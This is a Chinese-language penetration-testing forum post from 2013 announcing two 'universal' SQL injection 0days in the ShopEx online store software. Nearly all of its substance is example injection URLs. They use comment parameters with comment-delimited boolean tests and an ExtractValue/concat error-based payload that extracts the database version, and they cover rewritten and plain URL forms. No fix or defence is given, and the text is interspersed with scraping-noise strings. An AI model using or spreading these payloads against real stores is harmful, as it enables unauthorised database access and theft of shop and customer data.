中国网络渗透测试联盟

标题: shopex通杀注入0day漏洞两处 [打印本页]

作者: admin    时间: 2013-2-19 08:31
标题: shopex通杀注入0day漏洞两处
注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
) t6 r8 x" v1 o; c/ K4 u  h
. D& f% e# o! P# B+ k7 T9 R好吧,我扯远了~~5 [3 q% y- E( ^  b
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
9 I4 l( F4 F" u* M( n不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
2 B! D# O2 S0 [: I7 f1 ]5 I1 t. K% }' B% u. B1 I8 x
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
6 b+ L) y. o" i+ O  d' T9 Z3 p/ g$ B
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
! R# ]# c- P' r* n! a, u; n( {+ l9 F+ @& _5 w" l
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html $ y* i4 Q+ e0 a* q( d; y, t

( ]* \6 M* x& O# }http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html " H  I9 j- P  c0 G! z' R! @
; q; r. x- S. I4 A- l9 D
& x5 K) e  J3 W7 u9 ^* t* B
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
! @' v5 h- q+ r6 G0 @/ F, ]如何注入就不多说了,10多年的东西了…不会也会了…
4 y+ l8 }8 Q. Y+ K& m5 j0 P4 [' p5 x1 @8 g+ J( R2 C2 d, u% T, F
4 t: P! u9 S1 M9 L
# D$ P8 q1 Z& C. p* q+ S4 Q7 n

$ k0 X8 Q9 t6 x- c& s! q; `




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2